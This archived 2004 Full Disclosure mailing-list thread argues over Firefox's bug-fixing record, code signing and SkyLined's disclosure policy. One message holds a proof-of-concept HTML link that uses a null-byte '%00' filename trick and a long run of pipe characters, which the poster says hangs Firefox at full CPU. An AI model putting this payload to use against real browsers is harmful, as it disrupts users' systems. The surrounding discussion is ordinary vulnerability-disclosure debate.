Full Disclosure mailing list archives

Re: To anybody who's offended by my disclosure policy-GET THIS GUYS
From: devis <devis () easynix net>
Date: Thu, 16 Dec 2004 16:04:35 +0100

Rafel Ivgi, The-Insider wrote:

SkyLined is a great dude. Serious guy!
He is only worthy of RESPECT and no blame.
There is no signed law against releasing such information and it's funny
someone is anyhow talking about this in
FULL-DISCLOSURE list, whose entire concept is to disclose full details
about vulnerabilities.

By the way, for all of FireFox fans....FireFox has many open vulnerabilities
which its vendor refuses to fix. Even after notifying
and even after 4 months :-)...Moreover, they are just like MS claiming
certain bugs are not bugs, talking "in the air" and without checking
and under-blowing risk values. They don't even sign their exe's (which is a
super minimal protection against man-in-the-middle replacing downloads) so
Microsoft Windows can't say it's a valid file from a valid vendor and not a
virus.

For Example:
<a
href='http://theinsider.deep-ice.com/ctfmon.exe%00/hehe.exe.||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||
'>test it</a>

This has no effect on I.E......
Will cause LooserFox, ahh sorry, FireFox to ***BURN ALL YOUR CPU!!! 100%
FOREVER...***
What i am saying is, it is now who codes the software, it is how you do.
(if i was not in a job working frame, i would be publishing things that will
cause you all to say its shit)
FireFox team claimed it's an old bug. bla bla bla. and has no problem and no
security risk...bla bla bla... and didn't fix it after 4 months...
Just like MS when they are not even commercial, then what are they? on the
way to making money...to be the second size'd market share browser.

GO SKYLINED!

Rafel Ivgi, The-Insider
Security Consultant
Malicious Code Research Center (MCRC)
Finjan Software LTD
E-mail: rivgi () Finjan com
---------------------------------
Prevention is the best cure!
----- Original Message -----
From: "ph0enix" <ph0enix () ph0enix org>
To: "'Gadi Evron'" <ge () linuxbox org>
Cc: "'Berend-Jan Wever'" <skylined () edup tudelft nl>;
<full-disclosure () lists netsys com>
Sent: Saturday, November 27, 2004 5:56 PM
Subject: Re: [Full-disclosure] To anybody who's offended by my disclosure
policy

No software is immune from bugs. Explain exactly what point you are trying to prove here? 4 month old bug? Not being fixed? Considering the age of code, how many bugs have been fixed, how fast they have done it, and how many spyware actually take advantage of the brilliant bug you are posting (known for ages....use bugzilla, and with no danger of remote code execution, just crash), i think the track record of Firefox is quite exemplary. Please mention another popular browser with such track history....I let you search for a while.

Nobody said Firefox was immune from bugs, and your trolling doesn't reach far i am afraid. BTW what's the correlation with Skylined way of releasing security advisories? Claiming the code base is 'shit' with 'if's' is once again defined as trolling in my world. So get real, the point is: - Despite having (like all software) some bugs, Firefox is WAYS WAYS WAYS safer than anything else on Bill Platform. No it is not a magic lock of ur MS box, and it may be owned by many other ways. Nobody said install firefox and relax, but it's already a step forward compared to daily malware removal. More CPU needed? sure, lets integrate it in Windows ala iexplore.exe ....

Finally to crush ur trolling, just do you understand what is a Digitally Signed MS app? It is a lump of money you pay after forwarding your app to MS, and they will happily give u a receipt for your dollars stating that this app, on a stock XP install, will not crash your box. NOTHING MORE. As soon as you are out of the Stock Install, no more warranties are given. Basically it's hype again, it does not possess anything more than non digitally signed code. It is designed to have fools like you thinking they got something for their money. So with that light, i bet you can start to imagine why Firefox doesn't pay MS to digitally sign it, even so i bet MS will refuse it. And you are right, one day AV solutions will exclusively be based on digital signatures ( *EEEK* ) and soon:

"Norton 2010 has detected a virus on your system:  Firefox.win32"


Finjan ??? Sounds like someone at Redmond...
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

